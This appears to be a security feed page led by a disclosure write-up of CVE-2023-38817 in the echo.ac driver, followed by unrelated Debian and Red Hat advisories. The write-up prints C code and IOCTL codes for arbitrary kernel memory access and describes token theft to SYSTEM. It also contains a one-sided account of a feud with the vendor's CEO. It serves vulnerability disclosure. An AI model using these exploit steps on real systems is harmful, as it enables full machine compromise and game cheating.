An issue in Inspect Element Ltd Echo.ac v.5.2.1.0 allows a local attacker to gain privileges via a crafted command to the echo_driver.sys component.

CVE-2023-38817 - A vulnerability in a gaping security hole of a driver allows an attacker to attain nt authority\\system privileges via a Privilege Escalation attack.

A Proof of Concept abusing this exploit to attain Privilege Escalation on a Local machine.

Logo by my good friend and co-credited discoverer of this vulnerability, Zach.

PoC source code can be found here: https://github.com/kite03/echoac-poc.

**CVE Info**

*   Number: CVE-2023-38817
*   Vendor: Inspect Element Ltd (13017981), trading as Echo.
*   Affected Products: echo.ac AntiCheat scanner tool.
*   Affected Versions: echo.ac - <5.2.1.0, echo\_driver.sys - All shipped versions.
*   Affected operating systems: 64Bit versions of Windows from; Windows 7 to Windows 11.
*   Mitigation: Do not use the software, and add driver signatures to blacklist.

**Credits**

*   Protocol (Whanos): GitHub Link - Initial discovery, first contact with echo.ac, and exploit development.
*   kite03: GitHub Link - Exploit development, and writing.
*   Lemon (Wishes to stay anonymous): - Exploit development and assistance.

**Background**

echo.ac is a commercial "screensharing tool", marketed and developed mostly for the Minecraft PvP community, but also used by some other game communities - such as Rust. A "screensharing tool" is a program developed to "assist" server admins in identifying if someone's using cheats or similar banned external tools in-game, effectively a single-run Anticheat scanner.  
As such - these programs execute numerous intrusive scans on a users computer, while being deliberately very vague of what they data collect and why.

Additionally, as these programs are for (terrible) Admins to "check if a user is cheating", they are given to the user under duress - as users will be threatened with a permanent ban from the server they were playing on if they refuse.  
Furthermore, these users are usually quite young and **do not understand the issue of running random executables on their personal computer** (see the current plague of malware on Discord presently).

When this point was brought up to them, they reacted aggressively and attacked us for criticising this practice. We think that it is unfair that users can be banned for not wanting to run this invasive software.

I (Whanos/protocol) also attempted to disclose this exploit to the CEO in private before disclosing it publicly - to allow ample time for the developers to patch it, but they brushed me off, saying that it's not a bug - and then banning me from their discord server.

Our interactions with echo are documented in this blog post, after the bug

Thanks for reading!

**The Bug**

echo-free.exe - their client app, deploys a Kernel driver named echo_driver.sys to a newly generated folder in %TEMP%. This driver appears to be used mostly to scan and copy target processes memory so it can be analysed later to "check for cheats" (glorified string-searching tool...)

Unfortunately, this gaping security hole of a driver has no access controls on what programs can access it, making it trivial to abuse for all manners of exploits on the system.

Simply by using the following series of IOCTL codes, a local attacker can control the driver to Read and Write memory on the system. We abuse this in our PoC to read the Kernel's EPROCESS/KPROCESS block in memory, and then perform Access Token Theft using the driver - copying it into a newly spawned shell of ours, which immediately escalates it's privileges to nt authority\system (Highest system permissions).

Uh oh.

**The Attack**

*   Firstly, create the service and start the driver using sc create EchoDrv binpath=C:\PathToDriver.sys type= kernel && sc start EchoDrv .
*   Next, get a handle to the driver, which uses device path \\\\.\\EchoDrv.
*   Now execute IOCTL code 0x9e6a0594 to bypass an internal check - shown later.

    // Yes, this buffer seems useless - but without it the driver BSOD's the PC.
    // Create a buffer to store useless data (we don't care about it)
    void* buf = (void*)malloc(4096);
    
    // Call IOCTL that sets the internal PID variable and gets past the DWORD check
    // 0x9e6a0594 - IOCTL Code
    DeviceIoControl(hDevice, 0x9e6a0594, NULL, NULL, buf, 4096, NULL, NULL);

Code Example

*   Set the PID to the exploiting program by using IOCTL code 0xe6224248, this returns a HANDLE to your provided PID.

    // The data struct the driver is expecting
    struct k_get_handle {
        DWORD pid;
        ACCESS_MASK access;
        HANDLE handle;
    };
    
    k_get_handle param{};
    // Set the PID and access we want.
    param.pid = GetCurrentProcessId();
    param.access = GENERIC_ALL;
    // Call the driver
    DeviceIoControl(hDevice, 0xe6224248, &param, sizeof(param), &param, sizeof(param), NULL, NULL);
    
    // Return the HANDLE. We'll need it later in all calls.
    return param.handle;

Code Example

*   Finally - you can use IOCTL code 0x60a26124 to make the driver execute MmCopyVirtualMemory with your given arguments, allowing the arbitrary Memory Read/Write.

    // Data structure
    struct k_param_readmem {
        HANDLE targetProcess;
        void* fromAddress;
        void* toAddress;
        size_t length;
        void* padding;
        uint32_t returnCode;
    };
    
    // Here is a simple read memory driver we use extensively in this PoC.
    BOOL read_memory_raw(void* address, void* buf, size_t len, HANDLE targetProcess) {
     	k_param_readmem req{};
     	req.fromAddress = (void*)address;
     	req.length = len;
    	req.targetProcess = targetProcess;
     	req.toAddress = (void*)buf;
    
    	BOOL success = DeviceIoControl(hDevice, 0x60a26124, &req, sizeof(k_param_readmem), &req, sizeof(k_param_readmem), NULL, NULL);
    	return success;
    }
    
    // An example using the above function could be something like this
    
    // Get the PID of the System
    DWORD systemPID;
    Driver.read_memory_raw(
    	(void *) (PsInitialSystemProcessEPROCESS + PIDOffset),
        &systemPID,
     	sizeof(systemPID),
    	processHandle
    );

Code Example

One thing to note is that the driver does not have a "write" function, but you can simply flip the to and from address parameters to "read" your data buffer into another program just fine.

*   Stop and remove the driver from your system by executing sc stop EchoDrv && sc delete EchoDrv.

**Why This Works**

The first IOCTL calls this function, which we seems to sets the output buffer for some internal BCrypt operations we frankly do not care about. Without this call the driver does not listen our commands.

    if (IOCTLCode == 0x9e6a0594) {
    	// First, get the output address
    	BCryptOutputBuffer = *IRP->AssociatedIrp.SystemBuffer;
        // Run some BCrypt stuff and output to buffer
    	NTSTATUS status = BCryptStuff(*BCryptOutputBuffer, sizeof(BCryptOutputBuffer) + 1);
    	if (NT_SUCCESS(status)) {
          *(undefined *)(BCryptOutputBuffer + 2) = 1;
        }
        *(undefined4 *)((longlong)BCryptOutputBuffer + 0x14) = 0x1000;
      }

A simplified version of the BCrypt buffer IRP Handler.

The next IOCTL looks up the PEPROCESS data of our given process' PID and stores it internally - then returns a HANDLE which much be provided in all subsequent requests. This appears to be the driver's "Access Control" - which is frankly, awful.

    if (IOCTLCode == 0xe6224248) {
    	// Shared IRP data buffer
    	ProgramPIDStruct = *(k_get_handle)IRP->AssociatedBuffer.SystemBuffer;
    	OurProcess = NULL;
    	NTSTATUS status = PsLookupProcessByProcessId(*ProgramPIDStruct,&OurProcess);
    	if (NT_SUCCESS(status)) {
    		status = ObOpenObjectByPointer(OurProcess,0,0,ProgramPIDStruct[1]);
    		if (NT_SUCCESS(status) {
    			if (OurProcess != NULL) {
    				ObfDereferenceObject(OurProcess);
    			}
    			// Set our HANDLE in shared buffer struct
    			*(HANDLE)ProgramPIDStruct = InternalHandle;
    			// Unused
    			*(undefined *)(ProgramPIDStruct + 4) = 1;
    		}
    	}
    	// Unused
    	ProgramPIDStruct[5] = 0x1001;
    }

Set PID IRP handler.

Finally, we can use the driver's Copy Memory IOCTL to do whatever we want with memory. Our parameters are directly fed into a CopyMemory function - which basically is just a wrapper for MmCopyVirtualMemory.

    if (IOCTLCode == 0x60a26124) {
        IRPBuffer = *(HANDLE)IRP->AssociatedBuffer.SystemBuffer;
        OurProcess = NULL;
        // Check driver has access to given HANDLE
        NTSTATUS status = ObReferenceObjectByHandle( * IRPBuffer, 0, *(POBJECT_TYPE * ) PsProcessType_exref, '\0', & OurProcess,
            (POBJECT_HANDLE_INFORMATION) 0x0);
        if (NT_SUCCESS(status)) {
    		// Call CopyMemory function with our parameter
            status = CopyMemory(OurProcess, IRPBuffer[1], (PVOID * ) IRPBuffer[2], (size_t * ) IRPBuffer[3],
                (PSIZE_T)(IRPBuffer + 4));
            // NT_SUCCESS
            if (NT_SUCCESS(status) {
    			// Set Return Code
                *(IRPBuffer + 5) = 1;
            }
        }
        if (OurProcess != NULL) {
            ObfDereferenceObject(OurProcess);
        }
    	// Unused
        *(undefined4 * )((longlong) IRPBuffer + 0x2c) = 0x1002;
        UVar5 = 0x30;
        goto LAB_140001b03;
    }

The Read memory IRP handler.

    NTSTATUS CopyMemory(PEPROCESS TargetProcess, void * FromAddress, PVOID * ToAddress, size_t * BufferSize, PSIZE_T BytesCopied)
    {
        NTSTATUS status;
        PEPROCESS ToProcess;
        uint StatusCode;
    
        ToProcess = IoGetCurrentProcess();
        status = MmCopyVirtualMemory(TargetProcess, FromAddress, ToProcess, ToAddress, BufferSize, 0,
            BytesCopied);
        StatusCode = 0;
        // 0xC0000022 - STATUS_ACCESS_DENIED
        if (!NT_SUCCESS(status)) {
            StatusCode = 0xc0000022;
        }
        return (NTSTATUS)StatusCode;
    }

CopyMemory function. It's basically just a MmCopyVirtualMemory wrapper.

Specifically, **MmCopyVirtualMemory** is an undocumented Windows API function which allows a Driver to copy the Virtual memory of a given process.

Also, the function is being executed at Kernel level - indicated by parameter 0 in the call above - which isKPROCESSOR_MODE_KERNEL!

In short, this means our exploit allows direct access to a Kernel mode memory context via simple IO requests from user-mode.

As you can see, the complete lack of access control or validation causes this driver to become effectively - A "Security-Hole As A Service".

*   The driver was built on June 18th 2021, so we can presume that **all** client program versions from that point onwards are vulnerable.
*   The vulnerable driver's SHA256 hash is ea3c5569405ed02ec24298534a983bcb5de113c18bc3fd01a4dd0b5839cd17b9.
*   The vulnerable driver's MD5 hash is 187ddca26d119573223cf0a32ba55a61.

**The Uses**

There are several uses for this exploit - having Kernel level memory access to anything on the system is very dangerous and abusable!

For our example, we perform a privilege escalation attack using it.

**Privilege Escalation**

In the GitHub repository there is a working Privilege Escalation attack which allows an attacking process to make any process run with nt authority\system privileges.  
This is dangerous because this has more permissions than any other user on the system, which could be easily used by malware to cause much more damage!

The default token privileges of a process running as a regular administrator.

The default token privileges of a process running at nt authority\system - notice how many more privileges it has!

**Cheating**

Additionally, this exploit can be (and has been) extensively used for Cheating in video games - it turns out that this driver was seemingly **whitelisted** by Easy Anti Cheat (EAC) - one of the most popular commercial Anticheat providers - allowing cheaters to trivially cheat in games protected by it!

This is due to the fact that back in ~May 2022, hundreds of echo's own users were banned by EAC in series of large ban waves - due to echo's methodology of mass-memory scanning all programs on a user's computer (a really **big** no-no for all Anticheats!).

The Discord announcement made by the CEO (Josh) upon finding out about the ban waves.

Somehow, echo managed to convince EAC to unban all the users affected by this - and seemingly whitelist their driver from being detected - all the whilst not patching the arbitrary memory Read/Write exploit described above!

In fact, after speaking with some cheater developers about this - some were abusing this to cheat in games such as Rust for almost a year prior to this writeup!

Reply from "tolessthan350gt", a highly reputed user on UnknownCheats - a popular cheating forum, demonstrating a similar exploit method to the one in this writeup, allowing them to cheat in any EAC protected game mostly scot-free!

Another cheat developer discussing their usage of echo's driver exploit for cheating.

**Other Projects**

*   Program protector (PPL stripper/adder) by sam: https://www.youtube.com/watch?v=TOVb-lyBNBY

> Thank you @WindowsKernel for the great add to #LOLDrivers! This is THE read you need for the weekend!https://t.co/WB155xzo6Dhttps://t.co/601sw51Dm7 https://t.co/3Vjlp4tVoI pic.twitter.com/Js3RG54xhU
> 
> — The Haag™ (@M\_haggis) July 14, 2023

The loldrivers.io maintainer loved it :)

NTTS included it in an incredible video!

**Addendum**

Doesn't detect the most blatant cheating tool or a VM... Lol

**That's the end of the exploit writeup!**

Thank you very much for reading.

The following section documents our conversations with the echo team and CEO, for clarity.

**The Aftermath**

First and foremost: Please do **not** harass anyone mentioned in this document. While some people might've gone too far in some aspects - harassment is **not** okay. Do not stoop to that level - thanks.

**Echo and Data**

Echo.ac is pretty quiet about the data it collects and why. Their own ToS on their website and scanning app does **not** tell us _what_ data is scanned and what exactly they will do with it.

ToS archived as of writing (~29th of June 2023):

*   Website Screenshot 1: Screenshot
*   Website Screenshot 2: Screenshot

Update 15/07/2023: As requested by Josh on his alt (that he has me blocked me on already), I have removed the statement saying the in app privacy policy is the same as the website's.

Sure Josh, I can remove this part for you. Doesn't change anything else about the writeup though.

Am I really that scary Josh? You are so scared of talking to me you'd rather DDoS me and block me on your alts to talk behind my back!

There are only 2 hints we get as to the data that they collect.

First are the result pages people publicly share in their discord. An example of which can be found here.  
Not much information can really be extrapolated from here, unfortunately.  
(Screenshots, in case they delete this scan):

*   Part One
*   Part Two
*   Part Three

Second, the policy that they publish.  
This policy is supposed to provide some transparency as to what data echo collects. It is assumed that, for ethical reasons if nothing else - a rough outline to the methods used to collect data are stated. Unfortunately, this policy is not trustworthy.  
This is because Echo has changed is policy regarding what they collect after the following interactions.  
Note that they still collect this data, they just don't tell their users anymore.  
They aren't being open as to what information they collect, and are clearly happy to hide things from their policy if it helps them evade criticism!

Consider the following tweet.

A very wise thing to ask!

**Since Bulbasaur's tweet was posted, they removed the line in their website about storing the memory of processes on the computer, but yet they still do it!**

After that tweet, they updated their "What do we log" FAQ:

Notice the omission of the sentence about them logging Process Memory!

How shady.

On the 24th of May 2023, I (protocol/Whanos) published a tweet to my personal Twitter account (@WindowsKernel) - sharing my concerns with Echo.AC, as well as sharing a tria.ge link, which reported suspicious behaviour from the Echo.AC client.

> please do not run random “screensharing tools” cause a Minecraft server admin wants to check if ur cheating 💀💀💀
> 
> specifically talking about @echodotac , a “screensharing tool” that scans your computer to “detect cheats”. Why would a scanning tool need to load a kernel driver? pic.twitter.com/5tAc31GsYE
> 
> — i am eating your IOCTLs (@WindowsKernel) May 24, 2023

My tweet. Archived screenshot: https://cdn.gls.cx/5c91602e6d41fec2

My tweet - albeit being a bit debatably sensationalised - didn't contain anything untrue, and was more of a general warning to not execute applications random server Admins want you to run on your PC.

At the time, my tweet only had interactions from my own followers - as I mostly post about cybersecurity to a relatively small audience.  
However - shortly after it was posted, the CEO of the company behind Echo.AC - Josh, and some developers and associates of Echo.AC responded with what could frankly only be described as hate-mail and bullying.

Most of these replies are still viewable on the original tweet, but as a precaution I screenshotted them for posterity.

Firstly, I received this DM from Josh, the CEO.

Honestly a pretty childish thing to receive from the legal CEO of a registered company.

I also received a frankly asinine amount of hate-mail replies from users that **never followed me beforehand!**, meaning that they were sent to my tweet by other users.

This user develops his own tool, similar to echo.ac.

Blatant lies from a developer for echo.

Sure buddy.

This account was inactive for years, and made its first replies ever to me. Totally not a developer's alt!

This user owns his own tool, similar to echo. Also, I think I know more about the Kernel than you, thanks!

One of them even called me the r-slur (Censored here). Great.

This account was inactive since 2018, till my tweet was posted. Totally not an alt!

At least Twitter support worked decently fast.

A screenshot of some of the users that are on their staff team and community support team, so you can compare names easier.

After this, I was blocked by the company's official Twitter account. Great response!

Whatever will I do!

**The Disclosure Attempt**

Steeled by this insane series of interactions, my friends and I (credited at the top) started digging into their driver to look for vulnerabilities.  
Unsurprisingly, it was trivial to discover the exploit, considering the visible lack of Kernel driver knowledge. It's basically just a copy-pasted Cheat Driver.

After we found the bug, we started preparing this writeup - and in the meantime I wanted to responsibly let the CEO know about the bug, so they can fix it before we release the writeup.  
Shockingly, they brushed it off as it not being an vulnerability, and passive-aggressively mocked me, before banning me. Lovely!

My conversation with the CEO follows, dated the 29th of June, 2023.

//WONTFIX Security-Hole As A Service

How do you not know about CVEs as an Anticheat company's CEO?

It's still your code buddy.

At this point I honestly gave up. He evidently doesn't care.

A screenshot of his profile, for context.

After this, I was banned from their Discord for the crime of attempting to responsibly report a vulnerability... lol?

Awesome damage control!

Overall, this entire situation is **very** damaging to your reputation.  
How would your users feel if they realise that actual real issues in _your_ own product is met with abuse and ignorance? - you should know better, Josh, especially as you are the **CEO** of an Anticheat company - which **requires the trust of your users** to exist!

**Fin - Thanks for reading!**

Contact me here.

Have a great day Josh.

CVE-2023-38817: EchOh-No! a Vulnerability and PoC demonstration in a popular Minecraft AntiCheat tool.

vantage6 is privacy preserving federated learning infrastructure. Versions 4.0.2 and prior use pickle, which has known security issue, as a default serialization module but that has known security issues. All users of vantage6 that post tasks with the default serialization are affected. No patches are currently available, but users may specify JSON serialization as a workaround.

CVE-2023-23930

Debian Linux Security Advisory 5523-1 - Two security issues were found in Curl, an easy-to-use client-side URL transfer library and command line tool.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5523-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
October 11, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : curl  
CVE ID         : CVE-2023-38545 CVE-2023-38546

Two security issues were found in Curl, an easy-to-use client-side URL  
transfer library and command line tool:

CVE-2023-38545

    Jay Satiro discovered a buffer overflow in the SOCKS5 proxy handshake.

CVE-2023-38546

    It was discovered that under some circumstances libcurl was  
    susceptible to cookie injection.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 7.74.0-1.3+deb11u10.

For the stable distribution (bookworm), these problems have been fixed in  
version 7.88.1-10+deb12u4.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmUmR4AACgkQEMKTtsN8  
TjbtKBAAtJ6fPT/1ZwS+elK/8gzKI3xJFgfS6k/F5o5go30i82fFGK8k7aZNzTrw  
NQAPQ+DdWN4Nvm65qHXf8ME6jSNpnfmSSJ7k/RWVet8BJ3gMxOyBUOqAzK8CP5y1  
xW4Dnma3+EfA4g+f0fiJ8d5xTie29P+uo7qvKeUg1eCAbsUhoEortvkOtKSm/9wh  
hHq6h12LXFrDArEuOzKJZk58bo9xeMe/1BV3YdGh63lrRsz/RR/zFd51OLqn5Dgl  
eJRGwHe7pXIbaCI3mncEa0y6PHQMCZWrKdQxQC5BL4Ggut+Y2nVRMexZKzLD83Rl  
nrrD8LknLAr9QSNBjoMdf1s1rR7vboKNxYFtXcGf6nqFECQuSL4VihbJMIltUzpc  
LE4ppZxmrOs0Q78SFP+Xq5w1zMHg+2NIRx7EHDaGObvv4t3l/PoOXWI81wPxioKa  
zzxLAEVDI2Sfc6Qw/a1GmiIkEbEjhCW+LBUeOhLEfzd56W/7enCGrRFzrS6hKsbz  
Ibp2lPt6755ixpFsJ8PsVTEZ8C9jV41n8tL06BEG8+wSAc+1cHMJQ+0ceQxuXiTF  
Lrorm4rKgx76o8naAG+wPeg3rUawadAkhQzyUXKC1HqEDqcdIJhM+GL4qNI+ErPr  
E2w1K1Qo0g+1CUcYHdNTP6O3IklUwBiyJJeSn5q/AWZYH8aKdKc=  
=+znC  
-----END PGP SIGNATURE-----

Debian Security Advisory 5523-1

Debian Linux Security Advisory 5522-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5522-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
October 10, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat9  
CVE ID         : CVE-2023-24998 CVE-2023-41080 CVE-2023-42795 CVE-2023-44487  
                 CVE-2023-45648

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2023-24998

    Denial of service. Tomcat uses a packaged renamed copy of Apache Commons  
    FileUpload to provide the file upload functionality defined in the Jakarta  
    Servlet specification. Apache Tomcat was, therefore, also vulnerable to the  
    Commons FileUpload vulnerability CVE-2023-24998 as there was no limit to  
    the number of request parts processed. This resulted in the possibility of  
    an attacker triggering a DoS with a malicious upload or series of uploads.

CVE-2023-41080

    Open redirect. If the ROOT (default) web application is configured to use  
    FORM authentication then it is possible that a specially crafted URL could  
    be used to trigger a redirect to an URL of the attackers choice.

CVE-2023-42795

    Information Disclosure. When recycling various internal objects, including  
    the request and the response, prior to re-use by the next request/response,  
    an error could cause Tomcat to skip some parts of the recycling process  
    leading to information leaking from the current request/response to the  
    next.

CVE-2023-44487

    DoS caused by HTTP/2 frame overhead (Rapid Reset Attack)

CVE-2023-45648

    Request smuggling. Tomcat did not correctly parse HTTP trailer headers. A  
    specially crafted, invalid trailer header could cause Tomcat to treat a  
    single request as multiple requests leading to the possibility of request  
    smuggling when behind a reverse proxy.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 9.0.43-2~deb11u7.

We recommend that you upgrade your tomcat9 packages.

For the detailed security status of tomcat9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmUlyBRfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRBnhAAk1o0EDLnX1zaS0Xnz9jybhd9XdXat1HwZXvV3XFRGVXu5+r2bKH+KQjU  
0GJ6koP3KDt10DrI8DzOq+9Msu0/TbPYAZKDHPjPYfcUqXRmwRrvTXtq5cbR5v3+  
JxgJhiqjQYb1DYiDLC5iU+6aryrZg2ma1i81lG5v8N1TDfaCHzbZiMpyeYEABkd7  
eKX3tzngoK9UaIgYVBxrjnM9bPRWnRFJRBMu/hs4VS6gxqzAaZT72Tcaf0Vf3t1s  
Es5IMgrhBC0Q2Amlm3N5z37p0nlhnJdNC3dAHetRCy92g9/KsjB/1BZfYY7rM8wV  
WwvB5WwQ0T4eRqKmc8yY86sUdfXkhPqz1oFDbnNgxtBjMm2z/of9pNEm+2NCpv9P  
3MpCIKsEWiGH8+uleGuFhAHoWeUYjDNJjH1di6+PYZoBaEJ8eiXct/THBt/0nvFR  
Nh6AFDqi1Hi5/GdPK71eFRDsXOwgSuRg1ZRJtJP1W/dYEiczP89l0CM04PwxEAn2  
dbE2ZCUQmIzQdng4OAHt+ze+QDini4HtoRJnQHq4P/QUIEQAE9C0hOIMMnrtpqIY  
A77Qa1bBVqDgLlhvSmpSrVigmfyXSpmtfc9G0KXcq5IAvr75jZ0PNuIk/VTyklYj  
e3g3nA1rbB1jlx6cvPqWBFItXW8800mJ0CXHb8EN8jKdB5BnooY=  
=6KYM  
-----END PGP SIGNATURE-----

Debian Security Advisory 5522-1

Red Hat Security Advisory 2023-5628-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include null pointer and use-after-free vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5628.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security and bug fix update  
Advisory ID:        RHSA-2023:5628-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5628  
Issue date:         2023-10-10  
Revision:           01  
CVE Names:          CVE-2023-1095  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)

* kernel: net/sched: cls_fw component can be exploited as result of failure in tcf_change_indev function (CVE-2023-3776)

* kernel: net/sched: Use-after-free vulnerabilities in the net/sched classifiers: cls_fw, cls_u32 and cls_route (CVE-2023-4128)

* kernel: netfilter: NULL pointer dereference in nf_tables due to zeroed list head (CVE-2023-1095)

* kernel: save/restore speculative MSRs during S3 suspend/resume (CVE-2023-1637)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* avoid unnecessary page fault retires on shared memory types (BZ#2221102)

* [Hyper-V][RHEL-8] Fix VM crash/hang Issues due to fast VF add/remove events (BZ#2227261)

* kernel-devel RPM cross-compiled by CKI contains host-arch scripts (BZ#2232139)

* iavf: hang in iavf_remove() - SNO node hangs after running systemctl reboot (BZ#2232405)

* netfilter: RHEL 8.8 phase 2 backports from upstream (BZ#2236818)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-1095

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5628-01

Red Hat Security Advisory 2023-5627-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include bypass, null pointer, out of bounds write, and use-after-free vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5627.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security, bug fix, and enhancement update  
Advisory ID:        RHSA-2023:5627-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5627  
Issue date:         2023-10-10  
Revision:           01  
CVE Names:          CVE-2020-36558  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: use-after-free vulnerability in the perf_group_detach function of the Linux Kernel Performance Events (CVE-2023-2235)

* kernel: ipvlan: out-of-bounds write caused by unclear skb->cb (CVE-2023-3090)

* kernel: netfilter: use-after-free due to improper element removal in nft_pipapo_remove() (CVE-2023-4004)

* kernel: net/sched: Use-after-free vulnerabilities in the net/sched classifiers: cls_fw, cls_u32 and cls_route (CVE-2023-4128)

* kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval() (CVE-2023-35001)

* kernel: race condition in VT_RESIZEX ioctl when vc_cons[i].d is already NULL leading to NULL pointer dereference (CVE-2020-36558)

* kernel: LoadPin bypass via dm-verity table reload (CVE-2022-2503)

* kernel: an out-of-bounds vulnerability in i2c-ismt driver (CVE-2022-2873)

* kernel: xfrm_expand_policies() in net/xfrm/xfrm_policy.c can cause a refcount to be dropped twice (CVE-2022-36879)

* kernel: use-after-free due to race condition in qdisc_graft() (CVE-2023-0590)

* kernel: netfilter: NULL pointer dereference in nf_tables due to zeroed list head (CVE-2023-1095)

* kernel: hash collisions in the IPv6 connection lookup table (CVE-2023-1206)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* [HPEMC RHEL 8 REGRESSION] acpi-cpufreq: Skip initialization if a cpufreq driver exists (BZ#2186307)

* [max] RHEL8.4 Pre-Alpha - [ 4.18.0-240.4.el8.dt2.ppc64le ][ fleetwood / P9 64TB/192c ] While performing DLPAR CPU operations \"BUG: arch topology borken\" messages are observed and CPU remove operation fails for removal of 140 with 255 return (BZ#2210295)

* [Intel 8.8 BUG] [SPR] IOMMU: QAT Device Address Translation Issue with Invalidation Completion Ordering (BZ#2221098)

* avoid unnecessary page fault retires on shared memory types (BZ#2221101)

* [i40e] error: Cannot set interface MAC/vlanid to 1e:b7:e2:02:b1:aa/0 for ifname ens4f0 vf 0: Resource temporarily unavailable (BZ#2228164)

* oops on cifs_mount due to null tcon (BZ#2229129)

* kernel panic due to stack overflow on ppc64le due to deep call chain. (BZ#2230268)

* [Hyper-V][RHEL 8]incomplete fc_transport implementation in storvsc causes null dereference in fc_timed_out() (BZ#2230744)

* Withdrawal: GFS2: couldn't freeze filesystem: -16 (BZ#2231826)

* [RHEL 8][Hyper-V]Excessive hv_storvsc driver logging with srb_status  SRB_STATUS_INTERNAL_ERROR  (0x30) (BZ#2231989)

* kernel-devel RPM cross-compiled by CKI contains host-arch scripts (BZ#2232138)

* RHEL-8: crypto: rng - Fix lock imbalance in crypto_del_rng (BZ#2232216)

* [Intel 8.9] iavf: Driver Update (BZ#2232400)

* Important iavf bug fixes July 2023 (BZ#2232401)

* iavf: hang in iavf_remove() - SNO node hangs after running systemctl reboot (BZ#2232404)

* [RHEL 8.9] Proactively backport locking fixes from upstream (BZ#2235394)

* NAT sport clash in OCP causing 1 second TCP connection establishment delay. (BZ#2236515)

* xfs: mount fails when device file name is long (BZ#2236814)

* netfilter: RHEL 8.8 phase 2 backports from upstream (BZ#2236817)

* swap deadlock when attempt to charge a page to a cgroup stalls waiting on I/O plugged on another task in swap code (BZ#2237686)

Enhancement(s):

* [Intel 8.7 FEAT] TSC: Avoid clock watchdog when not needed (BZ#2216051)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-36558

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5627-01

Red Hat Security Advisory 2023-5622-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include memory leak, privilege escalation, and use-after-free vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5622.json

